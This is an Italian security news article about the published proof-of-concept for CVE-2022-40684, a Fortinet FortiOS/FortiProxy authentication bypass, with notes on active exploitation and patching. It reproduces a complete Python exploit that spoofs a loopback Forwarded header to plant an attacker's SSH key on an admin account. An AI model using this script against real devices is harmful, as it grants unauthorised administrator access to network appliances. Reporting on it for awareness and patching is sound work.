Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online
Source: Redhotcyber
Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online
Fortinet ha recentemente corretto una vulnerabilità critica di bypass dell’autenticazione nei progetti FortiOS, FortiProxy e FortiSwitchManager (CVE-2022-40684). Questa vulnerabilità offre a un utente malintenzionato la possibilità di accedere come amministratore al sistema interessato.
È stato reso disponibile un codice exploit proof-of-concept (PoC), rendendo di fatto ancora più essenziale l’installazione delle patch prodotte dal vendor, qualora non siano impostati gli aggiornamenti automatizzati.
“FortiOS espone il portale web di gestione che consente a un utente di configurare il sistema”
ha affermato il ricercatore di sicurezza dell’azienda Horizon3.ai James Horseman .
“Inoltre, un utente può SSH nel sistema che espone un’interfaccia CLI bloccata.”
#!/usr/bin/python3
import argparse
import json
import requests
import urllib3
requests.packages.urllib3.disable_warnings()
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
HEADERS = {
'User-Agent': 'Report Runner',
'Forwarded': 'for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"'
}
def format_key(key_file):
with open(key_file) as f:
k = f.read().strip()
return(k)
def add_key(target, username, key_file):
key = format_key(key_file)
j = {
"ssh-public-key1": '"' + key + '"'
}
url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
r = requests.put(url, headers=HEADERS, json=j, verify=False)
if 'SSH key is good' not in r.text:
print(f'[-] {target} is not vulnerable!')
else:
print(f'[+] SSH key for {username} added successfully!')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-u', '--username', help='The user to add an SSH key file for', required=True)
parser.add_argument('-k', '--key-file', help='The SSH key file', required=True)
args = parser.parse_args()
add_key(args.target, args.username, args.key_file)
Il problema, rilevato come CVE-2022-40684 (punteggio CVSS: 9,6), riguarda una vulnerabilità di bypass dell’autenticazione che potrebbe consentire a un utente malintenzionato remoto di eseguire operazioni dannose sull’interfaccia amministrativa tramite richieste HTTP(S) appositamente predisposte.
Sfruttare con successo la carenza, equivale a garantire l’accesso completo “per fare qualsiasi cosa” sul sistema interessato, inclusa la modifica delle configurazioni di rete, l’aggiunta di utenti malintenzionati e l’intercettazione del traffico di rete.
Il rilascio del PoC arriva quando Fortinet ha avvertito di essere a conoscenza di uno sfruttamento attivo della falla di sicurezza, spingendo la Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti a emettere un avviso che esorta le agenzie federali a correggere il problema entro novembre 1, 2022.
La società di intelligence sulle minacce GreyNoise ha rilevato 12 indirizzi IP univoci che utilizzavano la CVE-2022-40684 a partire dal 13 ottobre 2022, la maggior parte dei quali si trova in Germania, seguita da Stati Uniti, Brasile, Cina e Francia.
L’articolo Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online proviene da Red Hot Cyber.